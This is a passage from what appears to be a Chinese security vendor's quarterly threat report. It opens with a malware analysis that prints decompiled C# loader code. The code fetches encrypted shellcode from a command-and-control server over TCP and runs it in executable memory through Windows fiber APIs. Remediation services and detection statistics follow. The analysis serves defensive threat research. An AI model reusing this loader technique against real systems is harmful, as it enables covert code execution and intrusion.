49、129.28.1xx.187:12345下载payload，如果多次没连上则执行自删除。动态调试会发现样本会开线程池，从线程池中取线程。猜测恶意行为是通过开启线程的方式加载起来的。开启线程池（来源：亚信安全威胁情报中心）验证猜测：main函数中部分关键代码块解读如下：Python/遍历c盘下的文件夹 string files=Directory.GetFiles(C:,*.);/创建一个线程列表用于存放线程名 -32-List list2=new List();/将获取到的文件夹名字存入数组array中 string array=files;/将c盘下的dll遍历并加载到内存中 foreach

50、(string dllFile in array)Thread thread=new Thread(ThreadStart)delegate LoadDLLA(dllFile););list2.Add(thread);/起线程 thread.Start();foreach(Thread item2 in list2)/执行线程，并打印线程信息 item2.Join();Console.WriteLine(item2.ToString();Console.WriteLine(所有 DLL 文件已加载。);Process.GetCurrentProcess();AppDomain currentD

51、omain=AppDomain.CurrentDomain;Console.WriteLine(正在加载的 DLL：);assemblies=currentDomain.GetAssemblies();上述代码主要完成以下工作：遍历c盘，起线程，加载dll。Python UnloadDLLs();Console.WriteLine(DLLs unloaded.);using(HttpClient client=new HttpClient()string requestUri=https:/ HttpResponseMessage obj=await client.GetAsync(reque

52、stUri);obj.EnsureSuccessStatusCode();Console.WriteLine(await obj.Content.ReadAsStringAsync();catch(Exception ex)Console.WriteLine(发生错误:+ex.Message);Type typeFromHandle=typeof(ReflectExample);object obj2=Activator.CreateInstance(typeFromHandle);-33-MethodInfo method=typeFromHandle.GetMethod(SayHello)

53、;object array2=new object1 1;上述代码主要请求https:/ private static void Run()while(true)try /密钥 byte key=new byte16 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ;/盐 byte iv=new byte16 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ;/进行tcp连接 TcpClient tcpClient=new TcpClient(IP,port);/使用密钥和盐对收到的数据进行解密，解密后的数据存入数组array中 by

54、te array=ReceiveFile(tcpClient,key,iv);tcpClient.Close();/shellcode解密 string string=Encoding.UTF8.GetString(Convert.FromBase64String(af2VyfbmVsfMzIufZGxs.Replace(f,);/获取导出函数ConvertThreadToFiber地址 (ConvertThreadToFiber)Marshal.GetDelegateForFunctionPointer(GetExportAddress(string,ConvertThreadToFiber

55、),typeof(ConvertThreadToFiber)(IntPtr.Zero);/获取virtualalloc地址 IntPtr intPtr=(VirtualAlloc)Marshal.GetDelegateForFunctionPointer(GetExportAddress(string,VirtualAlloc),typeof(VirtualAlloc)(IntPtr.Zero,(UIntPtr)checked(ulong)array.Length),-34-AllocationType.MEM_COMMIT|AllocationType.MEM_RESERVE,64u);/将

56、shellcode存入刚刚申请的内存空间中 Marshal.Copy(array,0,intPtr,array.Length);/创建纤程 IntPtr lpFiber=(CreateFiber)Marshal.GetDelegateForFunctionPointer(GetExportAddress(string,CreateFiber),typeof(CreateFiber)(0u,intPtr,IntPtr.Zero);/起纤程执行shellcode (SwitchToFiber)Marshal.GetDelegateForFunctionPointer(GetExportAddres

57、s(string,SwitchToFiber),typeof(SwitchToFiber)(lpFiber);finally Thread.Sleep(5000);上述代码主要从服务器端获取一段Shellcode，然后对Shellcode进行解密后创建纤程执行Shellcode。该cc已无响应，从测绘平台发现一段疑似Shellcode的响应，经解密后发现此Shellcode不完整。响应包（来源：亚信安全威胁情报中心）结合创建时间看，这两个样本疑似测试版本，样本回连地址为127.0.0.1，核心函数与上述样本基本一致：3691caa8a8d4f0d69f67c3d39426da01 86282b

58、46b73c3c7b576261d98fb3f879 样本关联（来源：亚信安全威胁情报中心）-35-2024年年第第一一季度网络安全威胁治理季度网络安全威胁治理 一一、银狐治理方案银狐治理方案发布发布 “银狐”组织是一个活跃于东南亚的黑产团伙，他们采用产业化的方法进行分工和运营。这种方式涉及多个组织的协同工作，使得我们面临的挑战不仅仅是对抗单一的恶意程序，而是需要与一个完整的黑色产业链上的多个组织进行斗争。这种复杂的组织结构和协作方式大大增加了防御的难度，要求我们在策略和技术上都进行相应的调整和提升。亚信安全持续追踪“银狐”组织，依托于技术、人员和服务，针对“银狐”木马提出了事前风险排查，事中

59、应急处置和事后安全加固的治理方案。【银狐治理总体措施】事前风险排查事前风险排查 面向企业，针对“银狐”木马，进行事前风险排查，通过DNS流量汇聚、DNS流量监测、定位风险终端、实现攻击溯源、清除“银狐”木马的“五步走”措施，检测、溯源并清除“银狐”木马，实现事前风险排查闭环。1.DNS流量汇聚流量汇聚，协助客户汇聚DNS流量，将相关分支机构的DNS流量指向至总部DNS服务器，同时确保总部DNS服务器安全，稳定和可靠。2.DNS流量监测流量监测，部署亚信AE设备，采用旁路部署的模式，将DNS流量镜像至AE设备，全面监测DNS流量中存在的勒索威胁。3.定位风险终端定位风险终端，通过MSS运营结合威

60、胁情报，通过非法DNS查询，判别网络中是否存在”银狐“风险，一经发现，立即追踪溯源，定位风险终端。4.实现攻击溯源实现攻击溯源，在风险终端上部署EDR，检测、分析“银狐”在该终端的风险行为、时间、影响范围等，最终形成完整的溯源报告。-36-5.清除清除“银狐银狐”木马木马，通过EDR，针对风险终端上存在的“银狐”木马，进行响应处置，彻底清除“银狐”木马。事中应急处置事中应急处置 “银狐银狐”风险持续监测风险持续监测，部署AE/TDA/TrustOne等安全设备，持续监测DNS非法查询与终端异常外联行为，实时发现企业的“银狐”风险，并进行分析溯源。“银狐银狐”风险联动处置风险联动处置，针对“银狐

61、”木马，形成联动处置能力，通过LinkOne等统一管理平台，结合AE/TDA/TrustOne等工具，针对“银狐”风险进行联动处置。【“银狐”木马产品联动处置】“银狐银狐”风险风险MSS服务服务，通过MSS运营，结合AE/TDA/TrustOne等工具，为企业提供“银狐”攻击检测溯源服务，可疑外连监测服务等。事后安全加固事后安全加固 事后安全加固目的是安全隐患清除，增强安全运营能力。极大程度修复高危勒索风险的漏洞、弱密码、关闭高危端口、清除”银狐”残留风险。现有的安全设备策略调优，安全设备最大化地发挥安全效果。安全运营能力补齐，根据当前安全现状补齐7*24H“银狐”防护能力。-37-【事后安全

62、加固】产品与服务清单产品与服务清单 -38-二、二、攻防演练解决方案攻防演练解决方案3.03.0重磅发布重磅发布 自2016年起，国家攻防演习已开展八年，参与防守单位从起初2个壮大至23年近300个。攻防演练防守工作已成为各防守单位年度工作中的重中之重。但防守单位面临防护技术手段薄弱、经验少、技术人员不足等诸多挑战，因此采购第三方安全服务已成为各防守单位的第一选择，在攻防演练即将到来之际，亚信安全重磅发布攻防演练解决方案3.0。攻防演练利器攻防演练利器-外部攻击面管理服务迭代外部攻击面管理服务迭代 以攻击者视角评估企业暴露的外部攻击面，协助摸清家底、及时收敛外部风险资产、排查敏感数据泄密风险。

63、攻防演练利器攻防演练利器-入侵与攻击模拟服务发布入侵与攻击模拟服务发布 从攻击者角度出发，模拟入侵攻击行为，验证现有安全防护体系的防护能力，包括钓鱼邮件、邮件网关、威胁情报、WAF、威胁防护、终端安全、数据保护等方面。攻防演练优势攻防演练优势 攻防演练攻击，连续获得国家攻防演练攻击队TOP10，在多个省、市级、行业级攻防演练中获得若干次第一名，包括江苏省攻防演练、广东省攻防演练、天津市攻防演练等演练活动。攻防演练防守，2023年国家级攻防演练活动中，通过高效的协同作战体系做到了近百防守项目0事故、100%客户0出局、95%客户0失分，入选公安部多篇优秀技战法的成绩；2022年在公安指挥部组织部

64、分参演单位进行为期一天的无害化恶意程序攻防演练中，协助我们客户在演练中获得第一名，被评为无害化恶意程序防守典型单位；2021年配合国家信息中心制定全国电子政务外网攻防演练行动实践指南教材。-39-业内第一家将外部攻击面管理服务融入到攻防演练/重保/勒索治理解决方案的厂商；亚信外部攻击面管理平台入选安全牛攻击面管理技术应用指南十大代表性厂商。-40-三、三、勒索攻击演练服务重磅发布勒索攻击演练服务重磅发布 亚信安全通过分析历年勒索攻击事件，提取不同勒索团伙在勒索各阶段常用的攻击手段，孵化出一系列勒索攻击场景，通过模拟勒索攻击的方式，可在初始入侵阶段、横向移动、权限提升、权限维持、数据外泄、执行勒

65、索等攻击阶段，开展勒索攻击演练，以此验证客户针对于勒索攻击不同阶段的防御能力。初始入侵阶段：初始入侵阶段：该阶段是整个勒索攻击过程的基础，可通过模拟社交钓鱼、邮件钓鱼、漏洞利用等手段，获取内网非授权主机的访问权限。横向移动阶段：横向移动阶段：通过演练网络服务扫描、嗅探，收集主机、身份、凭证等信息，攻击集权系统等方式，进一步扩大控制范围和获取更多敏感信息。权限提升阶段：权限提升阶段：演练利用提取漏洞、进程注入、BypassUAC等手段，提升权限级别。权限维持阶段：权限维持阶段：演练通过添加计划任务、启动项，白利用、DLL劫持等手段，确保长期保持对系统的控制权。数据外泄阶段：数据外泄阶段：演练通过

66、C2通道、WEB服务、公有云存储、远程桌面应用程序等方式，进行数据外泄。执行勒索阶段：执行勒索阶段：利用亚信自主开发的软件，下载部署并执行勒索软件等操作。-41-勒索演练优势勒索演练优势 专业攻防能力专业攻防能力：连续获得国家攻防演练攻击队TOP10，在多个省、市级、行业级攻防演练中获得若干次第一名。多年经验积累多年经验积累：国家级SL扫雷行动核心支撑厂商、国家级应急支撑单位、国家级病毒实验室、30年病毒数据样本积累、专业级应急响应中心（每年处理数万案件）。勒索家族追踪勒索家族追踪：持续跟踪近千家勒索家族，日均捕获样本过百万。专业安服团队专业安服团队：完备的整体解决方案，团队覆盖31个省及直辖

67、市，四级梯队全天候响应，累计处置勒索事件过万起。-42-2024年年第第一一季季度度网络网络安全安全数据数据分析分析 一、病毒拦截信息统计病毒拦截信息统计（一）（一）病毒拦截次数排名 2024年一季度，亚信安全拦截Trojan.Win32.FRS.VSNW0CJ23病毒的次数达到19万次，排名第一位。其次是Trojan.VBS.EMOTET.SMAJC和TROJ_FRS.VSNTH323。木马是一种非常常见的恶意软件类型。它得名于古希腊的特洛伊木马故事，因其擅长伪装和欺骗的特性而命名。木马程序通常伪装成合法的软件或文件，诱使用户下载和安装。一旦激活，它可以执行各种恶意活动，如窃取敏感信息、下载

68、其他恶意软件、控制受感染的机器，或者作为后门功能，允许攻击者远程访问受感染的系统。在我们的日常工作和生活中，采取以下几个关键步骤至关重要：首先，定期更新操作系统和所有已安装的软件，确保应用所有的安全补丁，以此减少攻击者利用已知漏洞的机会。其次，对于电子邮件中的链接和附件，应保持警惕，避免随意点击或下载来历不明的文件，因为钓鱼邮件是传播木马的常见手段。此外，安装并持续更新优质的杀毒软件和防火墙，这些安全工具能有效识别和阻止木马及其他恶意软件。通过实施这些措施，我们可以显著降低木马病毒的感染风险，并增强对潜在网络安全威胁的防御能力。【2024年第1季度病毒拦截次数排名】963

69、44355493480332442320000200000250000病毒拦截数量病毒拦截数量TOP 10-43-二、二、勒索勒索软件软件信息信息统计统计 （一）勒索软件攻击数量统计 2024年第一季度，亚信安全拦截勒索软件攻击共计12,603次，与上一季度相比，拦截数量有所下降。这些攻击旨在通过加密个人用户、企业组织和公共机构的数据来勒索赎金。我们通过及时更新和优化安全防护措施来抵御日益复杂和变化的勒索病毒攻击。此外，用户和组织对于网络安全意识的提升也起到一定的积极作用，他们更加重视数据备份、讲究网络安全基础措施，以及警惕可疑

70、的电子邮件或链接。【2023年4月-2024年3月拦截勒索软件攻击数量】由于勒索病毒攻击是一种持续威胁，因此，需要我们持续关注和应对。随着技术的不断发展，黑客不断改进攻击手段，采取更加隐蔽和复杂的方式进行勒索病毒攻击。因此，亚信安全将继续加强病毒库的更新，实时监测和分析网络流量，积极参与威胁情报共享，以更好地保护用户和企业的数据安全。554650866466570686792437547654028380005000600070008000勒索软件攻击数量勒索软件攻击数量-44-（二）勒索软件拦截TOP 10 2024年第一季度勒索家族TOP 10中

71、，RANSOM_WCRY病毒居首位，其检测量高达33%，其次是RANSOM_CERBER和RANSOM_LOCKY。其中，Locky勒索病毒主要以钓鱼邮件和恶意URL的形式进行传播。黑客向受害者邮箱发送带有恶意Word文档的电子邮件，Word文档中包含有黑客精心构造的恶意宏代码。一旦受害者打开文档并运行宏代码后，主机会主动连接指定的Web服务器，下载并强制执行Locky恶意软件，主动连接C&C服务器，执行上传本机信息，下载加密公钥。Locky遍历本地所有磁盘和文件夹，找到特定后缀的文件，将其加密成后缀为.locky的文件。【2024年第1季度勒索家族拦截TOP 10】RANSOM_WCRY33

72、%RANSOM_CERBER16%RANSOM_LOCKY13%RANSOM_GANDCRAB11%TROJ_CRYPWALL7%RANSOM_BLOCKER5%RANSOM_BLACKSUIT4%RANSOM_FILECODER4%RANSOM_SPORA4%RANSOM_CRYPHYDRA3%勒索家族拦截勒索家族拦截 TOP 10-45-三、挖矿病毒信息统计三、挖矿病毒信息统计 （一）挖矿病毒拦截数量统计 2024年第一季度，亚信安全拦截挖矿病毒共计3,318次，拦截数量比上一季度有所下降。从月检测图来看，本季度的挖矿病毒检测数量呈递减趋势。【2023年4月-2024年3月挖矿病毒拦截数量

73、统计】200022089289730400800024002800挖矿病毒检测情况-46-（二）挖矿病毒家族TOP 10 2024年第一季度挖矿病毒家族TOP 10中，WORM_COINMINER家族居首位，其检测量高达49%，其次是COINMINER_MALXMR家族和TROJ_COINMINE家族。其中，WORM_COINMINER通过共享网络传播，释放并执行挖矿程序。【2024年第1季度挖矿病毒家族TOP 10】-47-四四、漏洞攻击拦截统计漏洞攻击拦截统计 （一）已知漏洞拦截TOP 10 在网络安全

74、领域，大多数漏洞利用病毒都是通过利用已知漏洞对系统进行攻击。这种攻击通常是由有经验的黑客或恶意攻击者利用已公开的、尚未修补的漏洞，通过特定的代码或恶意脚本来利用受影响的软件或系统漏洞。黑客将这些漏洞作为入口，试图获取非法权限、敏感数据，或者在目标系统上执行恶意操作。【已知漏洞拦截TOP 10】为了防止这样的攻击，及时修补已知漏洞是至关重要的。软件开发者和供应商通常会发布安全补丁或更新，以修复这些漏洞。因此，保持软件和系统的更新，及时修补已知漏洞，加强网络安全防护，是减少漏洞利用病毒攻击风险的重要措施。此外，网络用户也应加强安全意识，避免点击可疑链接、下载未经验证的文件，以及定期备份和加密重要数

75、据，以避免成为漏洞利用病毒攻击的受害者。5225226766768099242885747000100000APSA15-01APSB15-03CVE-2014-4148CVE-2014-4113CVE-2014-6271CVE-2010-2729CVE-2012-0158CVE-2013-3906CVE-2010-2568CVE-2008-4250已知漏洞拦截已知漏洞拦截TOP 10-48-关于亚信安全关于亚信安全 亚信安全是中国网络安全软件领域的领跑者，是业内“懂网、懂云”的网络安全公司。承继亚信30年互联网建设经验，肩负守护互联网之使命，亚信安

76、全于2015年正式启航，目前已成为建设中国网络安全的重要力量。不负使命，成功执行建党100周年、历年两会等国家重要网络安全保障任务30余次。依托互联网建设能力，让亚信安全具备强大的“懂网”业务能力与资源优势；深耕网络安全高精技术，让亚信安全拥有优异的“懂云”技术基因。亚信安全在云安全、身份安全、终端安全、安全管理、高级威胁治理及5G安全等领域突破核心技术，用实力筑牢云、网、边、端之安全防线。亚信安全在中国网络安全电信行业细分市场份额占比第一，连续五年蝉联身份安全中国市场份额第一，终端安全中国市场份额占比第二，在威胁情报、EDR、XDR等细分技术领域均居于领导者象限，是中国网络安全企业10强。秉承建网基因，坚守护网之责，亚信安全以护航产业互联为使命，以安全数字世界为愿景。2020年提出“安全定义边界”的发展理念，以身份安全为基础，以云网安全和端点安全为重心，以安全中台为枢纽，以威胁情报为支撑，构建“云化、联动、智能”的技术战略，守护亿万家庭和关键信息网络，建设全网安全免疫系统，为我国从网络大国向网络强国迈进保驾护航。更多关于亚信安全公司及最新产品信息，请访问:http:/www.asiainfo- 更多安全资讯请您关注亚信安全官方微信：